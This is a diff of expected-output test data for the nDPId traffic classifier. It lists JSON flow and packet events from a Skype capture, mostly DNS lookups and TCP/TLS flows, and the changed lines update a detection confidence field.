00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2226,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52742,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2226,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1431969720556,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969720556,"pkt":"0NQSxnP1PBXCt3IOCABFAABKnloAAEARWNXAqAEiwKgBAc4GADUANhjrBXkBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAAAEAAQ=="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2226,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst5.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2226,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52742,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst5.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2227,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":56387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2227,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1431969720556,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969720556,"pkt":"0NQSxnP1PBXCt3IOCABFAABK65gAAEARC5fAqAEiwKgBAdxDADUANtEePu0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAABwAAQ=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2227,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":56387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst5.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2227,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969720556,"flow_last_seen":1431969720556,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969720556,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":56387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst5.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2241,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969716015,"flow_last_seen":1431969721054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2903,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1431969721054,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50121,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2273,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":2,"flow_last_seen":1431969721596,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969721596,"pkt":"0NQSxnP1PBXCt3IOCABFAABKt0gAAEARP+fAqAEiwKgBAc4GADUANhjrBXkBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAAAEAAQ=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2274,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":2,"flow_last_seen":1431969721596,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969721596,"pkt":"0NQSxnP1PBXCt3IOCABFAABKslEAAEARRN7AqAEiwKgBAdxDADUANtEePu0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAABwAAQ=="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2276,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2276,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1431969721954,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969721954,"pkt":"0NQSxnP1PBXCt3IOCABFAABA0TgAAEARJgHAqAEiwKgBAc3qADUALN\/7ZhIBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2276,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52714,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2276,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52714,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2277,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51802,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2277,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1431969721954,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969721954,"pkt":"0NQSxnP1PBXCt3IOCABFAABAl6MAAEARX5bAqAEiwKgBAcpaADUALFPq9ZgBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2277,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51802,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2277,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969721954,"flow_last_seen":1431969721954,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969721954,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51802,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2284,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":3,"flow_last_seen":1431969722604,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969722604,"pkt":"0NQSxnP1PBXCt3IOCABFAABK1+UAAEARH0rAqAEiwKgBAc4GADUANhjrBXkBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAAAEAAQ=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2285,"source":"skype.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":3,"flow_last_seen":1431969722604,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969722604,"pkt":"0NQSxnP1PBXCt3IOCABFAABK050AAEARI5LAqAEiwKgBAdxDADUANtEePu0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDUBcgVza3lwZQNuZXQAABwAAQ=="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2288,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969722958,"flow_last_seen":1431969722958,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969722958,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50130,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -971,17 +971,17 @@ 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2314,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":3,"flow_last_seen":1431969723864,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969723864,"pkt":"0NQSxnP1PBXCt3IOCABFAAAujeYAAEARD0nAqAEiTLnPDDLdsbUAGk80noICQMd2CkIbTJvr2m+0rjWR"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2315,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63421,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2315,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1431969723979,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969723979,"pkt":"0NQSxnP1PBXCt3IOCABFAABLQV0AAEARtdHAqAEiwKgBAfe9ADUAN4CxqiYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2315,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63421,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2315,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63421,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2316,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65037,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2316,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1431969723979,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969723979,"pkt":"0NQSxnP1PBXCt3IOCABFAABLuaAAAEARPY7AqAEiwKgBAf4NADUANx167A0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2316,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65037,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2316,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65037,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2320,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":3,"flow_last_seen":1431969724089,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969724089,"pkt":"0NQSxnP1PBXCt3IOCABFAABAyr4AAEARLHvAqAEiwKgBAc3qADUALN\/7ZhIBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2321,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":3,"flow_last_seen":1431969724089,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969724089,"pkt":"0NQSxnP1PBXCt3IOCABFAABAk9AAAEARY2nAqAEiwKgBAcpaADUALFPq9ZgBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2329,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969724570,"flow_last_seen":1431969724570,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969724570,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2329,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1431969724570,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969724570,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJs1AAEAGdVvAqAEi1KEIJMPTNFCYsmkqAAAAALAC\/\/+V\/gAAAgQFtAEDAwUBAQgKPiPKSgAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2330,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":2,"flow_last_seen":1431969724644,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969724644,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQw9NEN1OLmLJpK6ASOJD4ewAAAgQFrAQCCAo\/mJ6PPiPKSgEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2331,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":3,"flow_last_seen":1431969724644,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969724644,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0kBRAAEAGDCDAqAEi1KEIJMPTNFCYsmkrRDdTjIAQECxPXAAAAQEICj4jypQ\/mJ6P"} -00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2339,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969724570,"flow_last_seen":1431969724719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1459,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1431969724719,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2339,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969724570,"flow_last_seen":1431969724719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1459,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1431969724719,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":2,"flow_last_seen":1431969725034,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969725034,"pkt":"0NQSxnP1PBXCt3IOCABFAABLrvwAAEARSDLAqAEiwKgBAfe9ADUAN4CxqiYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2354,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":2,"flow_last_seen":1431969725034,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969725034,"pkt":"0NQSxnP1PBXCt3IOCABFAABLUrMAAEARpHvAqAEiwKgBAf4NADUANx167A0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2364,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969725833,"flow_last_seen":1431969725833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969725833,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50132,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -990,29 +990,29 @@ 